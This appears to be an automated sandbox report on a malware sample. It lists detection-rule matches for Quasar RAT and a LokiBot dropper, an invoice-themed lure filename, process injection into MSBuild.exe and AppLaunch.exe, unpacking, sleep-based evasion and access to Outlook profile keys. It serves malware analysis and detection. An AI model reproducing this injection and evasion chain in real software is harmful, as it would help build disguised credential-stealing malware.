    Source: 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000000.00000002.379707702.0000000004597000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000000.00000002.364389176.00000000043F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_01BCF030
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_01BC3D10
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_01BC3D00
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_05484A60
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_05484A50
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_06337E12
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_0633A48D
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_0633BEB5
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_06358337
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_0635DF90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 16_2_051305B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 16_2_051305A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 16_2_05134850
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 16_2_05134860
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383883284.00000000046DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.358839460.00000000033F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.384949271.000000000477C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000000.262097375.0000000000F12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameProforma Invoice INV-87634543-7.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.361648144.00000000034B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBB NATIVE BOTNET.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeBinary or memory string: OriginalFilenameProforma Invoice INV-87634543-7.exe vs SecuriteInfo.com.W32.AIDetectNet.01.19566.exe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeVirustotal: Detection: 25%
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe.logJump to behavior
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@1/1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';n
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;>Cannot add a PRIMARY KEY column4Cannot add a UNIQUE columntCannot add a REFERENCES column with non-NULL default valuehCannot add a NOT NULL column with default value NULLZCannot add a column with non-constant default
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
    Source: AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence' 4
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: hti.sLnagaugfe
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, 00000000.00000002.383910090.000000000470F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000000.351294987.0000000000401000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: F*\AC:\Users\TSC\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp$
    Source: MSBuild.exe, 0000000E.00000002.531785304.000000000046C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: F*\AC:\Users\TSC\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeBinary or memory string: .vbpmva
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeBinary or memory string: mt]wXwA~ll.vbpmrv
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.csCryptographic APIs: 'CreateDecryptor'
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.csCryptographic APIs: 'CreateDecryptor'
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic file information: File size 2457088 > 1048576
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x247e00
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: ThunderFox.pdb source: AppLaunch.exe, 00000010.00000002.403484045.0000000009250000.00000004.08000000.00040000.00000000.sdmp, AppLaunch.exe, 00000010.00000002.400484465.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000010.00000003.380923428.0000000007E66000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    .NET source code contains potential unpacker
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exe, bgp.cs.Net Code: jmv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, yX3qVQPc7HrPvyJ6nV/cZ6To4JeF1gFLqv7a4.cs.Net Code: TOsyUfqmE System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
    .NET source code contains method to dynamically call methods (often used by packers)
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_05484A0F push 5D669499h; ret
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_06337E12 push es; retf 3382h
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_06330540 pushad ; retf
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeCode function: 0_2_063577AE push es; retf
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 16_2_051322D4 push E9000001h; retn 0009h
    Source: 16.0.AppLaunch.exe.4e00000.0.unpack, QpTcrT36DsVgpTtXLp/Oq9yjRC3GTOkApLxE8.csHigh entropy of concatenated method names: '.cctor', 'R8V6PVGwssOvC', 'P2HJOU7G4', 'wcvPOg3MI', 'FGeQZ6To4', 'cF1ggFLqv', 'wa4rNX3qV', 'ec7CHrPvy', 'c6n3VdfEB', 'BOgbswNYn'
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exe TID: 2072Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 3508Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 16_2_05135D66 sldt word ptr [eax]
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
    Source: MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
    Source: SecuriteInfo.com.W32.AIDetectNet.01.19566.exeBinary or memory string: lqEMUttqO=
    Source: MSBuild.exe, 0000000E.00000003.421672820.0000000000F4E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.534247106.0000000000EE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess token adjusted: Debug
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 16_2_05134520 LdrInitializeThunk,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,KiUserExceptionDispatcher,
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46C000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46D000
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BB2008
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4D01008
    Allocates memory in foreign processes
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 protect: page execute and read and write
    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4E00000 value starts with: 4D5A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.19566.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
